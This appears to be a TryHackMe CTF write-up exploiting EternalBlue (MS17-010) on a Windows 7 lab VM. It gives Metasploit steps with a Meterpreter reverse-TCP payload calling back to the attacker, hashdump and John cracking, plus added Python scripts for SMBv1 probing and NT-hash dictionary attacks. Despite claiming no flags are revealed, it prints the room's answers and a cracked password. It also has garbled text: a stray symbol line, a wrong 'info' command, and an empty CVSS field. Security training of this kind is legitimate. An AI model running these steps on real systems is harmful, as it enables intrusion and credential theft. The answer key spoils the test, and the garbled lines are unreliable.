EternalBlue Exploitation Lab Report
By Nvpie
5th Nov 2022
From: Tryhackme.com
No flags revealed
Table of Contents
1. Executive Summary
   1.1 Scope of work
   1.2 Project objectives
   1.3 Assumptions
   1.4 Timeline
2. Methodology
   2.1 Recon (Reconnaissance)
   2.2 Scanning
   2.3 Gaining Access
   2.4 Privilege Escalation
   2.5 Cracking
3. Recon
   3.1 Scan Results
   3.2 Detailed System Information
   3.3 Vulnerability Assessment
4. Gain Access
   4.1 Step 1: Start the Metasploit Console
   4.2 Step 2: Load the EternalBlue Module
   4.3 Step 3: Check "info"
   4.4 Step 4: Set the payload
   4.5 Step 5: Set options
   4.6 Step 6: Run the exploit
5. Escalation
6. Cracking
7. Reporting
8. References
1. Executive Summary
1.1 Scope of work
1. The assessment was carried out from a CTF perspective, with the only supplied information
being the IP address of the tested VM.
2. The attacking host was a Kali Linux VM and the target was a Windows 7 Professional SP1 VM at
192.168.43.180.
3. Perform the penetration test and answer the questions.
1.2 Project objectives
1. This security assessment is carried out to demonstrate the EternalBlue exploit against a VM
vulnerable to MS17-010.
2. Find the answers to these questions:
Questions
1. How many ports are open with a port number under 1000?
2. What is the machine vulnerable to?
3. What is the non-default user?
4. What is the cracked password?
1.3 Assumptions
1. While performing this lab we assumed that the VM has the unpatched MS17-010 vulnerability.
2. Both machines have a working internet connection, are connected to the same network, and can
talk to each other.
1.4 Timeline
The timeline of the Lab is as below:
Penetration Testing        Start Date    End Date
EternalBlue Exploitation   17/09/2022    17/09/2022
2. Methodology
We are going to use the usual methodology:
RECON
SCANNING
GAINING ACCESS
ESCALATE
CRACKING
2.1 Recon (Reconnaissance)
This is the very first stage of hacking, where the attacker does as much research about the target
as possible. It is also known as footprinting and covers three main areas:
1. Network
2. Host
3. People involved
There are two types of footprinting:
Active: Directly interacting with the target to gather information about it, e.g. scanning the
target with the Nmap tool.
Passive: Collecting information about the target without directly accessing it, e.g. from social
media, public websites, etc.
2.2 Scanning
Three types of scanning are involved:
Port scanning: Scanning the target for information such as open ports, live systems and the
services running on the host.
Vulnerability scanning: Checking the target for weaknesses or vulnerabilities that can be
exploited, usually with the help of automated tools.
Network mapping: Finding the network topology (routers, firewalls and servers, if any) and host
information, and drawing a network diagram from the available information. This map can be a
valuable piece of information throughout the hacking process.
2.3. Gaining Access:
In this phase the attacker breaks into the system or network using various tools or methods.
After entering a system, the attacker has to raise their privileges to administrator level in order
to install the applications they need, or to modify or hide data.
2.4. Privilege Escalation:
Once an attacker has compromised a server or PC, it is common to immediately try to obtain
higher-level permissions on that machine. This is called privilege escalation. One purpose is
persistence: the attacker can create a new administrator account with their own username and
password, and then simply log in on the next visit rather than having to inject malware each time.
2.5. Cracking:
After gaining higher privileges, an attacker may want to crack the passwords of the machine's users
so that they can log into the target whenever they wish without the user's knowledge, or worse,
change the password and leave the user locked out.
They can use brute forcing, dictionary attacks, social engineering, or cracking the password hashes
if they gain access to them. The popular password cracking tool John the Ripper automates password
cracking and is very helpful in this lab.
3. Recon
Scan the machine with a vulnerability script (Nmap NSE) to find known vulnerabilities.
3.1 Scan Results
3.2 Detailed System Information
IP ADDRESS       SYSTEM TYPE       OS INFORMATION
192.168.43.180   Virtual Machine   Microsoft Windows 7 Professional Service Pack 1

OPEN PORTS
Port    Protocol   Service        Version
135     TCP        msrpc          Microsoft Windows RPC
139     TCP        netbios-ssn    Microsoft Windows netbios-ssn
445     TCP        microsoft-ds   Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152   TCP        msrpc          Microsoft Windows RPC
49153   TCP        msrpc          Microsoft Windows RPC
49154   TCP        msrpc          Microsoft Windows RPC
49155   TCP        msrpc          Microsoft Windows RPC
49156   TCP        msrpc          Microsoft Windows RPC
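The two recon questions (how many open ports are below 1000, and whether the host is flagged for MS17-010) can be answered from the scan data itself rather than by reading a screenshot. The script below is an added example, not part of the original report: it parses Nmap's -oX XML output. The XML embedded in it is constructed to mirror the port table above (plus one filtered port and a hypothetical smb-vuln-ms17-010 host-script result, neither captured from the lab VM).

```python
"""Parse Nmap -oX output to answer the recon questions of this lab:
open ports below 1000, and whether the smb-vuln-ms17-010 NSE script
marked the host VULNERABLE.

Example code added to this report. SAMPLE_NMAP_XML is constructed, not a
real capture: the open ports mirror the scan table, the filtered 3389
entry and the hostscript block are assumed for illustration.
"""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of "nmap -sV --script vuln -oX - <target>".
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV --script vuln -oX - 192.168.43.180">
  <host>
    <status state="up"/>
    <address addr="192.168.43.180" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="49152"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="49153"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="49154"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="49155"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="49156"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)">
        <table key="CVE-2017-0144">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <elem key="ids">CVE:CVE-2017-0144</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return {"addr": ip, "open_ports": [(port, proto, service)], "vulns": {id: state}}."""
    root = ET.fromstring(xml_text)
    host = root.find("host")
    addr = host.find("address[@addrtype='ipv4']").get("addr")
    open_ports = []
    for port in host.iter("port"):
        if port.find("state").get("state") != "open":
            continue  # filtered/closed ports are not counted as open
        service = port.find("service")
        open_ports.append((int(port.get("portid")), port.get("protocol"),
                           service.get("name") if service is not None else ""))
    vulns = {}
    # NSE vuln scripts report one <table key="<vuln id>"> per finding with a "state" elem.
    for script in host.iter("script"):
        for table in script.findall("table"):
            state = table.find("elem[@key='state']")
            if state is not None:
                vulns[table.get("key")] = state.text
    return {"addr": addr, "open_ports": sorted(open_ports), "vulns": vulns}


def ports_below(result, limit=1000):
    """Open port numbers strictly below `limit` (the lab's first question)."""
    return [p for p, _proto, _svc in result["open_ports"] if p < limit]


def is_ms17_010_vulnerable(result):
    """True when smb-vuln-ms17-010 reported CVE-2017-0144 as VULNERABLE."""
    return result["vulns"].get("CVE-2017-0144") == "VULNERABLE"


if __name__ == "__main__":
    r = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(r["addr"], "open ports:", [p for p, _, _ in r["open_ports"]])
    print("ports under 1000:", ports_below(r))
    print("MS17-010 vulnerable:", is_ms17_010_vulnerable(r))
```

Feeding it a real scan is a matter of replacing SAMPLE_NMAP_XML with the contents of an `-oX` file; the state filter matters because `--script vuln` scans routinely list filtered ports that must not be counted.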
3.3 Vulnerability Assessment
8 open ports: 135, 139, 445, 49152, 49153, 49154, 49155, 49156
1 vulnerability: MS17-010 (EternalBlue), remote code execution in the SMBv1 server
CVE-ID: CVE-2017-0144 (NVD entry, reference 6)
CVSS v3.1 Base Score:
Severity: Critical (Microsoft's rating for the MS17-010 bulletin)
Impact: remote code execution on the target (reference 1)
Mitigation: apply the MS17-010 update, https://technet.microsoft.com/library/security/ms17-010;
as a further hardening step, disable SMBv1 on hosts that do not need it.
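Whether SMBv1 is still reachable on port 445 is worth checking both before the exploit and after the mitigation has been applied. The probe below is an added example (not code from the report or the TryHackMe room): it sends one SMB1 NEGOTIATE request offering only the "NT LM 0.12" dialect and classifies the reply. A server that answers with an SMB1 negotiate response and accepts the dialect has SMBv1 enabled; one that answers in SMB2 or drops the connection does not. The reply embedded for the self-test is constructed, not captured from the lab VM.

```python
"""SMB1 NEGOTIATE probe: does the host still speak SMBv1, the protocol
EternalBlue abuses? Added example, not code from the report. The reply
produced by constructed_smb1_response() is made up for testing.
Usage: python3 smb1_probe.py 192.168.43.180
"""
import socket
import struct
import sys

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
NT_LM_012 = b"NT LM 0.12"


def _smb1_header(command, flags=0x18, flags2=0x0801, pid=0x1234, mid=1):
    """32-byte little-endian SMB1 header (MS-CIFS SMB_Header)."""
    return struct.pack("<4sBIBHH8sHHHHH",
                       SMB1_MAGIC, command,
                       0,             # NT status
                       flags,         # 0x18: canonicalized paths, case-insensitive
                       flags2,        # 0x0801: long names + extended security
                       0,             # PIDHigh
                       b"\x00" * 8,   # SecurityFeatures
                       0, 0,          # Reserved, TID
                       pid, 0, mid)   # PIDLow, UID, MID


def build_negotiate(dialects=(NT_LM_012,)):
    """NetBIOS-framed SMB_COM_NEGOTIATE offering only the given SMB1 dialects."""
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # SMB_Dialect entries
    smb = _smb1_header(SMB_COM_NEGOTIATE) + struct.pack("<BH", 0, len(data)) + data
    return b"\x00" + len(smb).to_bytes(3, "big") + smb          # session message + length


def parse_negotiate_response(data):
    """Classify a reply to build_negotiate()."""
    if not data:
        return {"protocol": "none", "dialect_index": None,
                "detail": "connection closed without a negotiate reply (SMBv1 likely disabled)"}
    smb = data[4:]                      # strip the 4-byte NetBIOS session header
    if smb[:4] == SMB2_MAGIC:
        return {"protocol": "SMB2", "dialect_index": None,
                "detail": "server answered in SMB2/3; SMBv1 was not negotiated"}
    if smb[:4] != SMB1_MAGIC or len(smb) < 35 or smb[4] != SMB_COM_NEGOTIATE:
        return {"protocol": "unknown", "dialect_index": None, "detail": "unrecognised reply"}
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    if status != 0 or word_count == 0:
        return {"protocol": "SMB1", "dialect_index": None,
                "detail": "SMB1 negotiate rejected, NT status 0x%08x" % status}
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if dialect_index == 0xFFFF:
        return {"protocol": "SMB1", "dialect_index": None,
                "detail": "server speaks SMB1 but accepted none of the offered dialects"}
    return {"protocol": "SMB1", "dialect_index": dialect_index,
            "detail": "SMBv1 enabled: server accepted dialect index %d" % dialect_index}


def probe_smbv1(host, port=445, timeout=3.0):
    """Send the negotiate to a live host and classify its reply (network I/O)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate())
        try:
            reply = sock.recv(4096)
        except (ConnectionResetError, socket.timeout):
            reply = b""      # Windows with SMBv1 disabled simply drops the connection
    return parse_negotiate_response(reply)


def constructed_smb1_response(dialect_index=0):
    """Constructed (not captured) reply of an SMBv1-enabled server: 17 parameter
    words in the NT LM 0.12 layout, empty data block."""
    words = struct.pack("<HBHHIIIIqHB", dialect_index, 3, 50, 1, 4356, 65536, 0,
                        0x8001F3FD, 0, 0, 8)
    smb = (_smb1_header(SMB_COM_NEGOTIATE, flags=0x98, flags2=0xC801)
           + bytes([17]) + words + struct.pack("<H", 0))
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe_smbv1(sys.argv[1]))
    else:
        print(parse_negotiate_response(constructed_smb1_response()))
```

Offering only the NT LM 0.12 dialect is deliberate: an SMB1 negotiate that also lists "SMB 2.002" would let an SMB2-only server answer successfully and mask the result.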
4. Gain Access
Now that we have found the vulnerability, we can gain access to the target using the exploit.
4.1 Step 1: Start the Metasploit Console
The first step, as always, is to fire up Kali and start the Metasploit console:
msfconsole
4.2 Step 2: Load the EternalBlue Module
Once you have the "msf >" prompt, you are ready to start exploiting your target system. We first
need to find and load the EternalBlue exploit module. Search for it with:
msf > search eternalblue
The search shows that exploit/windows/smb/ms17_010_eternalblue (reference 5) is installed, and we
can use it for the exploitation.
23++,44$43!!3++$+
Now that EternalBlue module is loaded we can use it to perform our exploit.
4.3 Step 3: Check "Info"
To know more about module, we can use `/` command to display the information about how
the module works.
As you can see above, Metasploit provides some basic information (Name, Platform, Privileged,
Rank, etc.) on the module at the top, the options in the middle and a description of the module at
the bottom.
4.4 Step 4: Set the payload
Now that we have loaded our module and have some basic information on it, it is time to select a
payload to work with it. To see all the payloads that will work with this module, enter:
msf > show payloads
It is important to note that the "show payloads" command, run after selecting the exploit, only
shows the payloads that work with that exploit. If you run it before selecting an exploit, it
shows ALL payloads.
In this example I used a Meterpreter reverse TCP payload, but you can use any of the others that
appear on your payload list. If the exploit succeeds with this payload, it gives us a Meterpreter
session on the target system (the later steps, sysinfo, screenshot and hashdump, are Meterpreter
commands).
msf > set payload windows/x64/meterpreter/reverse_tcp
4.5 Step 5: Set options
The last step before we exploit is to set our options. To see the available options for this exploit
and payload combination, enter:
msf > show options
As you can see, there are numerous options, but the only ones we need to set are LHOST (our IP)
and RHOST (the target IP), along with LPORT and RPORT:
msf > set LHOST <Kali VM IP>
msf > set LPORT <listening port>
msf > set RHOST 192.168.43.180
msf > set RPORT 445
After setting those options, check them once more to make certain everything was typed properly
and that everything we need is set:
msf > show options
4.6 Step 6: Run the exploit
Now that all options are set, we can run the exploit using either the "exploit" or the "run"
command:
msf > exploit
As you can see above, Metasploit and EternalBlue attempt to exploit the Windows 7 SMB service.
Below that, Metasploit reports that the exploit succeeded and opened a session on the target
system. Success!
We got WIN!
This means we successfully exploited the target machine.
We now have a Meterpreter session and can use Meterpreter's purpose-built commands to interact
with the target system; they can be listed with the `help` command.
5. Escalation
To verify that we are on the Windows system, type "sysinfo" to see whether it displays the target's
system information:
meterpreter > sysinfo
You can now see that we are inside the target machine and it displays the target's computer name,
operating system, architecture and domain information.
Note that the session obtained through the ms17_010_eternalblue module already runs as
NT AUTHORITY\SYSTEM, because the exploit executes its payload in the kernel; no separate
privilege escalation is needed before dumping hashes.
We can perform various attacks and tasks on the target.
Example: taking a screenshot of the target's desktop:
meterpreter > screenshot
Such attacks can be found through the `help` command.
6. Cracking
Now we need to find the password of the user Jon. For that we use the hashdump command:
meterpreter > hashdump
Copy the line for the user Jon (format user:RID:LM hash:NT hash:::) and save it to a text file.
We need to find out which hash format this is, using the hashid command:
hashid <hash file>
Now that we know it is an NT hash, we can crack it with John the Ripper, using a wordlist:
john --format=NT --wordlist=<wordlist> <hash file>
Now that we have the password, alqfna22, of the user Jon, we can log into the system and leave a
message for the user to let him know he has been hacked, together with the patching method for it.
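John's speed on this hash comes from the NT hash format itself: MD4 over the UTF-16LE encoding of the password, with no salt, so every candidate costs exactly one MD4 and identical passwords produce identical hashes. The script below is an added example (not code from the report or from John the Ripper) that re-implements MD4, derives NT hashes, and runs the same dictionary attack over hashdump-style lines. The account "labuser", its hash and the wordlist are constructed for the example and are not Jon's hash from the lab VM.

```python
"""Dictionary attack on NT hashes, as John does for --format=NT:
NT hash = MD4(UTF-16LE(password)), unsalted, so each candidate costs one MD4.

Added example for this report. SAMPLE_HASHDUMP and SAMPLE_WORDLIST are
constructed: "labuser" is a made-up account whose NT hash is that of the
word "password"; it is not the lab's Jon account.
"""
import struct

_MASK = 0xFFFFFFFF
# (message-word index, rotate amount) for the 48 MD4 steps, per RFC 1320.
_ROUND1 = list(zip(range(16), (3, 7, 11, 19) * 4))
_ROUND2 = list(zip((0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13) * 4))
_ROUND3 = list(zip((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15) * 4))


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (hashlib's md4 is often missing under OpenSSL 3)."""
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Pad to 56 mod 64 bytes, then append the bit length as a little-endian u64.
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for k, s in _ROUND1:   # F(b,c,d) = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + ((b & c) | (~b & d)) + x[k]) & _MASK, s), b, c
        for k, s in _ROUND2:   # G(b,c,d) = majority, constant sqrt(2)
            a, b, c, d = d, _rotl((a + ((b & c) | (b & d) | (c & d)) + x[k] + 0x5A827999) & _MASK, s), b, c
        for k, s in _ROUND3:   # H(b,c,d) = b ^ c ^ d, constant sqrt(3)
            a, b, c, d = d, _rotl((a + (b ^ c ^ d) + x[k] + 0x6ED9EBA1) & _MASK, s), b, c
        h = [(v + w) & _MASK for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT (NTLM) hash as the lowercase hex string hashdump prints."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump_line(line: str):
    """Meterpreter hashdump format: user:RID:LM hash:NT hash:::"""
    user, rid, _lm, nt = line.strip().split(":")[:4]
    return user, int(rid), nt.lower()


def crack_nt_hashes(hashdump_lines, wordlist):
    """Return {user: password} for every hash matched by a wordlist entry."""
    targets = {}
    for line in hashdump_lines:
        user, _rid, nt = parse_hashdump_line(line)
        targets.setdefault(nt, []).append(user)   # unsalted: equal hashes share one lookup
    found = {}
    for word in wordlist:
        for user in targets.get(nt_hash(word), ()):
            found[user] = word
    return found


# Constructed sample hashdump output (not from the lab). labuser's NT hash is
# that of "password"; Guest's is the NT hash of the empty string. The LM field
# is the well-known "no LM hash" marker.
SAMPLE_HASHDUMP = [
    "labuser:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
]
SAMPLE_WORDLIST = ["letmein", "Password1", "password", "hunter2"]

if __name__ == "__main__":
    print(crack_nt_hashes(SAMPLE_HASHDUMP, SAMPLE_WORDLIST))   # {'labuser': 'password'}
```

Guest stays uncracked with that wordlist because the empty string is not in it; add "" to the list and it is recovered too, which is why real wordlists and rule sets include such degenerate candidates. Replacing SAMPLE_HASHDUMP with the real hashdump line and SAMPLE_WORDLIST with a file such as rockyou.txt turns this into the same attack John performed in the lab, only slower.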
7. Reporting
Collecting all the necessary screenshots and compiling the detailed report of the EternalBlue
exploitation lab.
We have collected all the information and compiled it into this report.
Let's recall the questions that we asked at the beginning.
Questions and Answers
1. How many ports are open with a port number under 1000?
Ans: 3 ports: 135, 139 and 445.
2. What is the machine vulnerable to?
Ans: MS17-010 (EternalBlue, CVE-2017-0144).
3. What is the non-default user?
Ans: Jon
4. What is the cracked password?
Ans: alqfna22
8. References
1. Exploit-DB: 'EternalBlue' SMB Remote Code Execution (MS17-010)
https://www.exploit-db.com/exploits/42315
2. Eternal Blue (MS17-010) vulnerability attack experiment
https://programmersought.com/article/56866337746/
3. SentinelOne: EternalBlue Exploit: What It Is And How It Works
https://www.sentinelone.com/blog/eternalblue-nsa-developed-exploit-just-wont-die/
4. Null Byte: Manually Exploit EternalBlue on Windows Server Using MS17-010 Python Exploit
https://null-byte.wonderhowto.com/how-to/manually-exploit-eternalblue-windows-server-using-ms17-010-python-exploit-0195414/
5. Rapid7: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/
6. National Vulnerability Database: CVE-2017-0144 Detail
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
7. TryHackMe CTF room for the EternalBlue exploit
https://tryhackme.com/room/blue